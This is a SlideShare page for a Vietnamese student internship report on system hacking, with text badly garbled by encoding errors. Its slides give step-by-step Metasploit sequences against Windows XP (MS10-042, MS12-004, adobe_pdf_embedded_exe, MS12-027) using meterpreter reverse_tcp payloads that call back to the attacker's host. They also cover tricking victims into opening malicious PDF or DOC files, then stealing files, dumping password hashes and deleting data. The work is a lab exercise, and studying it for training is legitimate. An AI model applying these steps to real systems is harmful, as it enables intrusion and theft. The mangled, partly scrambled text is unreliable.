ºÝºÝߣ báo cáo: System Hacking
•Download as PPTX, PDF•
1 like•1,245 views
Báo cáo thá»±c táºp System hacking_trung tâm athena
ºÝºÝߣ báo cáo: System Hacking
- 1. BÃO CÃO THá»°C TẬP SYSTEM HACKING GVHD: T . VÕ Äá»– THẮNG SVTT: HUỲNH DÆ¯Æ NG KHANG
- 2. Giới thiệu Thực hiện Tổng kết
- 3. Giá»›i thiệu • Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cÆ¡ quan, doanh nghiệp bị xâm nháºp, trung bình má»—i tháng có khoảng 300 website bị tấn công • Hiện nay, các thiết bị nhÆ° máy tÃnh PC, laptop, Ä‘á»u có kết nối mạng ná»™i bá»™ hoặc kết nối Internet . Trên các thiết bị nà y, hầu hết cà i đặt các phần má»m ứng dụng nhÆ° IE, Microsoft Office, Adobe Reader ,…. và chạy hệ Ä‘iá»u hà nh nhÆ° Windows XP, Windows 7…
- 4. Giá»›i thiệu system hacking Gồm những kỹ thuáºt lấy username, password dá»±a và o phần má»m cà i trên hệ thống hoặc các dịch vụ từ xa của hệ Ä‘iá»u hà nh Windows Nâng quyá»n trong hệ thống, sá» dụng keyloger để lấy thông tin, xóa những log file hệ thống Hacker có thể thá»±c hiện má»i thứ trên máy tÃnh đó, gây ra những háºu quả vô cùng nghiêm trá»ng cho các cá nhân, tổ chức
- 5. Các lá»— hổng thÆ°á»ng khai thác trong hệ Ä‘iá»u hà nh Windows NhÆ° chúng ta đã biết, Windows là hệ Ä‘iá»u hà nh phổ biến và được sá» dụng rá»™ng rãi nhất trên thế giá»›i hiện nay Hack
- 6. 1.Xuất hiện má»™t lá»— hổng có thể bị khai thác bằng các công nghệ hiện có. 2.Kẻ tấn công phát hiện lá»— hổng. 3.Kẻ nà y láºp tức tiến hà nh viết và phát tán công cụ khai thác lá»— hổng nà y. 4.Hãng sản xuất đồng thá»i phát hiện lá»—i và láºp tức tìm cách sá»a chữa 5.Lá»— hổng được công bố ra ngoà i 6.Các phần má»m anti-virus được cáºp nháºt thông tin để phát hiện khi có các Ä‘oạn mã tìm cách khai thác lá»— hổng nà y 7.Hãng sản xuất hoà n thà nh bản vá 8.Hãng hoà n tất phát hà nh bản vá lá»—i đến tất cả khách hà ng Các hãng sản xuất luôn cáºp nháºt các lá»— hổng và đưa ra các phiên bản má»›i sau khi đã vá lại các lá»— hổng của các phiên bản trÆ°á»›c. Và luôn theo má»™t trình tá»±
- 7. Quá trình tấn công và o má»™t hệ thống Tóm lại, quá trình tấn công hệ thống (System hacking) là bÆ°á»›c tiếp theo sau quá trình khảo sát, thu tháºp thông tin của mục tiêu cần tấn công bằng những kỹ thuáºt nhÆ° Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục Ä‘Ãch truy tìm thông tin. Execute (thá»±c thi): Thá»±c thi ứng dụng trên hệ thống Enumerate (liệt kê): TrÃch ra tất cả những thông tin có thể vá» máy user Ä‘Ãch. trong Chuẩn hệ thống. bị trÆ°á»›c Sá» malware, dụng phÆ°Æ¡ng keylogger, pháp thăm dò rootkit…SNMP để để có chạy được nó những trên máy thông tÃnh tin tấn hữu công Ãch, Hide (ẩn file): Những file thá»±c thi, file soucecode chạy chÆ°Æ¡ng trình… Cần phải được là m ẩn Ä‘i, tránh bị mục Crack: Công Ä‘oạn nà y có lẽ hấp dẫn nhiá»u Hackernhất. chÃnh xác hÆ¡n BÆ°á»›c nà y yêu cầu chúng ta bẽ khóa máºt khẩu đăng nháºp của user. Hoặc bằng má»™t cách nà o khác, mục Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tiêu tin phát có liên hiện quan tiêu đến diệt bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả Escalste (leo thang): Nói cho dá»… hiểu là chuyển đổi giá»›i tiêu hạn phải truy đạt cáºp tá»›i từ là user quyá»n binh truy thÆ°á»ng cáºp và o lên hệ admin thống hoặc năng bạn bị phát hiện là kẻ Ä‘á»™t nháºp là rất cao. user có quyá»n cao hÆ¡n đủ cho chúng ta tấn công
- 8. Giới thiệu Thực hiện Tổng kết
- 9. VMware workstation VMware Workstation là má»™t phần má»m ảo hóa desktop mạnh mẽ dà nh cho các nhà phát triển/kiểm tra phần má»m và các chuyên gia IT cần chạy nhiá»u HÄH má»™t lúc trên má»™t máy PC. NgÆ°á»i dùng có thể chạy các HÄH Windows, Linux, Netware hay Solaris x86,.. trên các máy ảo di Ä‘á»™ng mà không cần phải khởi Ä‘á»™ng lại hay phân vùng ổ cứng
- 10. Hệ Ä‘iá»u hà nh Backtrack 5 R3 - Backtrack là má»™t bản phân phối dạng Live DVD của Linux, được phát triển để thá» nghiệm xâm nháºp. Backtrack là sá»± hợp nhất giữa 3 bản phân phối khác nhau của Linux vá» thâm nháºp thá» nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dá»±a trên phiên bản phân phối Linux Ubuntu 11.10. - Backtrack 5 chứa má»™t số công cụ có thể được sá» dụng trong quá trình thá» nghiệm thâm nháºp của chúng ta
- 11. Phần má»m Metasploit • Metasploit là má»™t dá»± án bảo máºt máy tÃnh cung cấp các thông tin vá» vấn Ä‘á» lá»— hổng bảo máºt cÅ©ng nhÆ° giúp đỡ vá» kiểm tra thăm nháºp và phát triển hệ thống phát hiện tấn công mạng • Metasploit có thể chạy trên hầu hết các hệ Ä‘iá»u hà nh: Linux, Windows, MacOS.
- 12. SÆ¡ đồ tổng quan hệ thống mạng LAN Trong má»™t mạng LAN ná»™i bá»™, các máy tÃnh thÆ°á»ng kết nối vá»›i nhau vá»›i khoảng cách váºt lý gần nhÆ° trong má»™t phòng, má»™t tầng, má»™t tòa nhà , công ty, … Các máy tÃnh trong mạng LAN có thể chia sẻ tà i nguyên vá»›i nhau, mà điển hình là chia sẻ táºp tin, máy in, máy quét và má»™t số thiết bị khác
- 13. Xâm nháºp và khai thác Windows XP Khai thác lổ há»ng Ms10-042 • Nháºn dạng Lá»— hổng nà y có thể cho phép thá»±c thi mã từ xa nếu ngÆ°á»i dùng xem má»™t trang web thiết kế đặc biệt bằng cách sá» dụng má»™t trình duyệt web hoặc nhấp và o má»™t liên kết thiết kế đặc biệt trong má»™t thông báo e-mail
- 14. Xâm nháºp và khai thác Windows XP • Thá»±c hiện Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá» dụng lệnh: msf > search ms10_042 Copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn và o†Gõ show options để thấy các options của lệnh. msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
- 16. Lần lượt gõ các lệnh sau: msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
- 17. • Sau khi gõ lệnh exploit để khai thác lá»—i ta sẽ thấy chÆ°Æ¡ng trình Ä‘Æ°a ra cho ta 1 URL website, lúc nà y chỉ cần dụ nạn nhân nháºp và o URL nà y, ta sẽ tấn công được máy nạn nhân. Ở đây URL là http://192.168.132.137:80/
- 18. Backtrack gá»i mã Ä‘á»™c qua cho máy nạn nhân
- 19. • Gõ lệnh sessions để coi Session đang thực hiện, ta thấy có 1 Session đang thực hiện tấn công tới máy 192.168.132.138 trên port 1207 • Gõ lệnh sessions –i 1 • Ta đã tấn công được và o máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit
- 20. Xâm nháºp và khai thác Windows XP Khai thác lổ há»ng Ms12-004 a) Mô tả: Các lá»— hổng có thể cho phép thá»±c thi mã từ xa nếu ngÆ°á»i dùng mở má»™t táºp tin phÆ°Æ¡ng tiện truyá»n thông thiết kế đặc biệt Má»™t kẻ tấn công khai thác thà nh công lá»— hổng có thể lấy được quyá»n sá» dụng giống nhÆ° ngÆ°á»i dùng địa phÆ°Æ¡ng
- 21. • Cách thá»±c hiện tấn công Khởi Ä‘á»™ng msfconsole tá» cá»a sổ terminal của BackTrack > msfconsole Khai báo lá»— hổng sá» dụng và thiết đặt options: > Search ms12_004 > use exploit/windows/browser/ms12_004_midi > show options > set srvhost 192.168.192.130 > set lhost 192.168.192.130 > set payload windows/meterpreter/reverse_tcp > exploit
- 22. Xâm nháºp và khai thác Windows XP Khai thác lổ há»ng Ms12-004 • Mô tả: Nguyên tắc khai thác lá»—i ở đây khá Ä‘Æ¡n giản, bạn sẽ tạo ra má»™t file mã Ä‘á»™c có Ä‘uôi .pdf và gá»i cho nạn nhân, là m thế nà o để nạn nhân nháºn được và mở file có chứa mã Ä‘á»™c đó lên
- 23. • Thá»±c hiện Mô hình: Cách khai thác: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá» dụng lệnh dÆ°á»›i để search mã lá»—i trong msf msf > search adobe_pdf copy Ä‘Æ°á»ng dẫn, ở đây ta sá» dụng adobe_pdf_embedded_exe, enter gõ use “dán Ä‘Æ°á»ng dẫn và o†msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Gõ lệnh show options để thấy những option của lá»—i msf exploit(adobe_pdf_embedded_exe) > show options
- 24. Ở đây ta thấy bắt buộc phải tạo INFILENAME
- 25. Lần lượt gõ các lệnh: msf exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf Copy sẵn 1 file pdf bất kỳ là m infilename, ở đây mình có sẵn 1 file infilename.pdf ngoà i Desktop. msf exploit(adobe_pdf_embedded_exe) > set infilename /root/Desktop/infilename.pdf msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132
- 26. Äịa chỉ nà y là địa chỉ IP của máy Hacker chÃnh là máy BackTrack. msf exploit(adobe_pdf_embedded_exe)>set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > exploit Ta sẽ thấy có má»™t file filemadoc.pdf được tạo ra (đây chỉ là và dụ các bạn đặt tên theo ý mình thÃch), ta copy file “filemadoc.pdf†đã được tạo ra ngoà i Desktop cho dá»… sá» dụng msf exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf /root/Desktop
- 27. Váºy là việc tạo ra file chứa mã Ä‘á»™c đã xong, giá» ta gá»i file nà y cho nạn nhân để nạn nhân chạy file nà y là sẽ bị dÃnh mã Ä‘á»™c
- 28. • Upload file “filemadoc.pdf†lên Webserver bằng cách Ä‘Æ°a nó và o thÆ° mục “/var/www†Start Webserver ảo bằng lệnh (mở má»™t cá»a số cmd khác). root@bt:~# service apache2 start Giá» ta qua máy nạn nhân truy cáºp và o Webserver ta đã dá»±ng và tải file “filemadoc.doc†vá».
- 29. Khi nạn nhân mở file lên thì mã độc sẽ được tiêm và o
- 30. • Tạo ra một trình lắng nghe msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.119.132 msf exploit(handler) > exploit
- 31. Kiểm tra máy hacker ta thấy mã độc đã được tiêm và o máy nạn nhân Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1210 GiỠta có thể khai thác được máy nạn nhân
- 32. Xâm nháºp và khai thác Windows XP Khai thác lổ há»ng Ms12-004 • Mô tả Nguyên tắc khai thác lá»—i ở đây khá Ä‘Æ¡n giản, bạn sẽ tạo ra má»™t file mã Ä‘á»™c có Ä‘uôi .doc và gá»i cho nạn nhân, là m thế nà o để nạn nhân nháºn được và mở file có chứa mã Ä‘á»™c đó lên
- 33. • Thá»±c hiện: Mô hình: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sá» dụng lệnh dÆ°á»›i để search mã lá»—i trong msf msf > search ms12_027 copy Ä‘Æ°á»ng dẫn, enter gõ use “dán Ä‘Æ°á»ng dẫn và o†msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy những option của lá»—i msf exploit(ms12_027_mscomctl_bof) > show options
- 34. Ở đây ta thấy bắt buộc phải tạo FILENAME
- 35. • Lần lượt gõ các lệnh: msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc • Ta sẽ thấy có má»™t file filemadoc.doc được tạo ra (đây chỉ là và dụ các bạn đặt tên theo ý mình thÃch) msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132 • Äịa chỉ nà y là địa chỉ IP của máy Hacker chÃnh là máy BackTrack. msf exploit(ms12_027_mscomctl_bof) > exploit • Gõ lệnh exploit để thá»±c thi
- 36. msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc /root/Desktop ta copy file “filemadoc.doc†đã được tạo ra ngoà i Desktop cho dá»… sá» dụng. Váºy là việc tạo ra file chứa mã Ä‘á»™c đã xong, giá» ta gá»i file nà y cho nạn nhân để nạn nhân chạy file nà y là sẽ bị dÃnh mã Ä‘á»™c
- 37. Tấn công hệ thống sau khi tấn công • Xem thông tin hệ thống: > getuid >Sysinfo • Tải lên và đánh cắp tà i liệu • Tải file abc.txt tại Desktop của Back Track lên ổ C của XP > upload /root/Desktop/abc.txt C:/ • Äánh cắp file xyz.txt tại ổ C của XP và đem vá» Desktop của Back Track > download C:/xyz.txt /root/Desktop
- 38. • Lấy hashpass: >Haskdump • Khám phá ổ đĩa: meterpreter> shell • Chuyển dấu nhắc sang ổ đĩa C: > cd c: • Liệt kê tà i nguyên trong ổ C: > dir • Tạo thư mục abc trong ổ C: > md abc • Xóa thư mục abc trong ổ C: > rd abc • Xóa file abc.txt trong ổ C: > del abc.txt • Trở vỠmeterpreter: > exit
- 39. Giới thiệu Thực hiện Tổng kết
- 40. Tá»”NG KẾT • Máºt khẩu phải được đặt nhiá»u hÆ¡n 8 ký tá»± và phải là tổng hợp giữa chữ hoa, chữ thÆ°á»ng, số và ký tá»± đặc biệt để các chÆ°Æ¡ng trình khó dò ra • Không mở táºp tin Ä‘Ãnh kèm thÆ° Ä‘iện tá» có nguồn gốc không rõ rà ng hoặc không tin cáºy • Chắc chắn rằng bạn có và đã báºt hệ thống tÆ°á»ng lá»a cho hệ thống của mình.
Editor's Notes
- #5: á»Ì±